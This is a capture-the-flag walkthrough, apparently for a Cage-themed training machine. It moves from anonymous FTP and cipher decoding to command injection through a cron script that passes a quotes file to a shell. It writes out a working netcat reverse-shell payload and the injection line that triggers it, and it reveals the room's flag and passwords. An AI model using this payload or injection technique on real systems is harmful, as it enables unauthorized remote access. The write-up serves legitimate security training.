Help Cage bring back his acting career and investigate the nefarious goings on of his agent! Hmmmm. Sounds cheesy.


nmap says we’ve got 21 (FTP), 22 (SSH) and 80 (HTTP) only.


FTP allows anonymous login and there is one file, called dad_tasks. Downloading it and opening it we can see some sort of encoded text: UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPI… snip. You get the idea.

This is base64, and decodes to:

Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.
Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

Which is some sort of cipher, that looks like a rotation or Vignere. Spoiler alert - it’s not a simple rotation. Presumably Sfw is One, Faz is Two, Eljwx is Three, Rsfv is Four and Yejr is Five….

This website provides auto-solving of ciphers, and sure enough it’s vignere with the key namelesstwo:

dads tasks the rage the cage the man the legend
one revamp the website
two put more quotes in script
three buy bee pesticide
four help him with acting lessons
five teach dad what information security is
in case i forget….

The last part is the FTP and SSH password for ‘weston’

Other Files

Logging in, we can find a file called must_practice_corrupt_file.mp3 in /var/www/html/auditions, which we could also have found through dirbusting. What’s more, it contains audio steganography which we can access via Audacity and it gives the password … namelesstwo - which we already had. So, that’s not helpful.

We also find a few files in /opt/.dads_files/ There is a file called .quotes and a python script that broadcasts lines from .quotes; this apparently runs on a cron job. We can’t edit the python script but we can cat it - the contents are:

weston@national-treasure:/opt/.dads_scripts/.files$ cat ../ #!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open(“/opt/.dads_scripts/.files/.quotes”).read().splitlines()
quote = random.choice(lines)
os.system(“wall “ + quote)

So essentially it’s choosing a random line from the .quotes file and broadcasting it via the ‘wall’ command. We can edit the .quotes file, so that’s the way forward.

We don’t have nano, but can remove the .quotes file with rm and then append something to a new .quotes with echo or printf. Theoretically, and with testing, we should be able to use a command like

echo “whatever ;pwd” » .quotes


echo “whatever &&pwd” » .quotes

But these don’t work, because the command doesn’t actually complete when the script runs. What we can do instead is trigger a reverse shell:

cat « EOF > /tmp/shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 1234 >/tmp/f
chmod +x /tmp/shell
printf ‘whatever; /tmp/shell\n’ > /opt/.dads_scripts/.files/.quotes

User Cage

This gets us a shell as cage:

listening on [any] 1234 …
connect to [] from (UNKNOWN) [] 52624
/bin/sh: 0: can’t access tty; job control turned off
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’
cage@national-treasure:~$ cd /home/cage

And we can get the user flag:

cage@national-treasure:~$ cat Super_Duper_Checklist
cat Super_Duper_Checklist
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG}


Cage isn’t root, but his email backups give it away; Sean has root privileges. We’re also given haiinspsyanileph and the word face as a hint. This is another vignere cipher with face as the key, and it decodes to: cageisnotalegend.

Once we know that, we can su as sean and get the root flag.